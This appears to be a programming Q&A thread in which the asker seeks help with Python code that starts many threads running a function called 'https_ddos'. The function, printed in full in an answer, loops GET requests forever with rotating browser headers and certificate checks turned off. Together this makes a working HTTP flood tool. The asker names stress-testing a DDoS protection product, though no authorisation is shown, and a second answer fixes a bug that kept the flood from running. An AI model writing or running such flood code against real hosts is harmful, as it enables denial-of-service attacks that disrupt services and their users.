# About Two-dimensional array thread for network

Tags: python, python-3.x

I want use 2-dim array to make thread then do something but only the first columns work

this is part of code

```
thread_name=[]
if targeturl.lower=='ip':
    for j in range(0,len(iplist)):
        thread_name.append([])
        for i in range(0,x):
            urltest=urlparse(iplist[j])
            thread_name[j].append('0') 
            thread_name[j][i]=threading.Thread(target=https_ddos,args=(urltest,y))
            thread_name[j][i].start()
```

Comment: `target=https_ddos` looks suspicious, why are you doing this?

Comment: please give us more details!

Comment: I'm doing this because I'm trying 'DDoS & Network Visibility Solutions | NETSCOUT Arbor'

Comment: I want to know that if there is encrypt data what will arbor do

Comment: and stress test

Answer (score 1):

here is the function for https_ddos

```
def https_ddos(urltest,y):
    get_header0={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'zh-CN,cn;q=0.8,en-US;q=0.5,en;q=0.3','Accept-Encoding':' gzip, deflate','Upgrade-Insecure-Requests': '1','Pragma': 'no-cache','Cache-Control':'no-cache'}
    get_header1={'Pragma': 'no-cache','Cache-Control': 'no-cache','Upgrade-Insecure-Requests': '1','User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,cn;q=0.9,en-US;q=0.8,en;q=0.7'}
    get_header2={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134','Accept-Language': 'zh-CN','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Upgrade-Insecure-Requests': '1','Accept-Encoding': 'gzip, deflate','Cache-Control': 'no-cache'}
    if urltest.scheme=='https':
        context=ssl.create_default_context() 
        context.check_hostname=False
        context.verify_mode=ssl.CERT_NONE
        test=http.client.HTTPSConnection(urltest.netloc,None, key_file=None, cert_file=None,context=context,timeout=3)

        while True:
            r=randint(0,2)
            if r==0:
                test.request('GET',headers=get_header0,url=urltest.path)
            elif r==1:
                test.request('GET',headers=get_header1,url=urltest.path)
            else:
                test.request('GET',headers=get_header2,url=urltest.path)
            res = test.getresponse()
            res.read()
            print('Status', res.status)
            time.sleep(y)
    elif urltest.scheme=='http':
        c = HTTPConnection(urltest.netloc,None,timeout=3)
        r=randint(0,2)
        while True:
            if r==0:
                c.request('GET',headers=get_header0,url=urltest.path)
            elif r==1:
                c.request('GET',headers=get_header1,url=urltest.path)
            else:
                c.request('GET',headers=get_header2,url=urltest.path)
            resp = c.getresponse()
            resp.read()
            print('Status', resp.status)
            time.sleep(y)
```

Answer (score 0):

I found question is 
    if targeturl.lower=='ip':
should change to 
    if targeturl.lower()=='ip':